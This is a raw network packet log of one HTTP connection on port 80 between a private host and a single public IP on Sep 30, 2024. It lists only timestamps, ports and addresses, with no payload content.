Sep 30, 2024 15:10:15.126626015 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126667023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126684904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126710892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126729012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126748085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126766920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126785040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126796007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126811981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126831055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126849890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126966953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126966953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126966953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.127135992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.127146959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127166033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127276897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127295971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127316952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127336025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127377987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127430916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127449036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127466917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127475977 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.127476931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.127497911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127516985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127536058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127553940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127646923 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.127648115 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.127681017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127700090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127717972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127736092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127753973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.127816916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.127985954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.128139019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128197908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128262997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128325939 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.128439903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128458977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128490925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128494978 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.128516912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128535986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128554106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128601074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128619909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128638983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128657103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128665924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.128684998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128704071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128721952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128741026 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128758907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128777027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.128837109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.128837109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.128837109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.129004955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.129143000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129195929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129250050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129302979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129322052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129340887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129344940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.129381895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129431009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129448891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129467010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129486084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129504919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129565954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.129565954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.129734993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.129734993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.129759073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129806042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129825115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129842997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129928112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.129978895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130034924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130053043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130074024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130076885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130076885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130101919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130211115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130229950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130249023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130266905 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130285978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130292892 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130311966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130331039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130348921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130455017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130465031 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130465031 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130635023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130637884 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130745888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130800962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130805016 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130805016 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130829096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130847931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130866051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130884886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130932093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130950928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130969048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.130974054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.130996943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131030083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131048918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131136894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131144047 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.131165028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131314039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.131314039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.131314039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.131377935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131431103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131449938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131469011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131484032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.131654024 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.131803989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131823063 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.131865978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131907940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131926060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131943941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.131993055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.132056952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.132076025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.132093906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.132112980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.132157087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.132163048 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.132256985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.132312059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.132333994 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.132333994 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.132333994 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.132503986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.132673025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.133390903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133411884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133553982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.133586884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133605957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133625031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133660078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133677959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133697033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133716106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133723974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.133723974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.133753061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133894920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.133943081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.133945942 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.133997917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134016991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134036064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134054899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134073019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134089947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134108067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134113073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134283066 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134305954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134330988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134355068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134373903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134391069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134408951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134427071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134444952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134464025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134481907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134500980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134504080 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134525061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134542942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134562016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134579897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134598017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134614944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134633064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134650946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134671926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134671926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134841919 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134841919 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.134891033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134938002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134957075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134974957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.134994030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135013103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135031939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135049105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135066032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135083914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135101080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135118961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135137081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135154963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135173082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135180950 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.135199070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135216951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135235071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135252953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135270119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135287046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135304928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135323048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135354042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.135360003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135370970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135389090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135406971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135453939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135476112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135493994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135513067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.135524035 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.135571003 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.135740995 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.136284113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136321068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136339903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136358023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136377096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136395931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136414051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136430979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136449099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136466980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136471987 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.136495113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136512995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136521101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.136539936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136559010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136576891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136595964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136615038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136632919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136651039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136689901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136693954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.136693954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.136733055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136861086 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.136893988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.136938095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137031078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137031078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137078047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137140036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137157917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137176991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137196064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137201071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137315989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137336016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137353897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137370110 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137378931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137398005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137415886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137434959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137453079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137470961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137490034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137507915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137526035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137542009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137542009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137542009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137542009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137710094 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137753010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137809992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.137881041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.137938976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138042927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138051033 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138051033 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138094902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138113022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138197899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138216972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138221025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138221025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138246059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138263941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138309956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138328075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138346910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138364077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138381958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138391018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138391018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138411999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138431072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138449907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138468027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138561010 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138561964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138680935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138730049 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138786077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138839006 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138900042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.138921976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138968945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.138988018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.139005899 CEST	80	49754	172.67.215.93	192.168.11.20
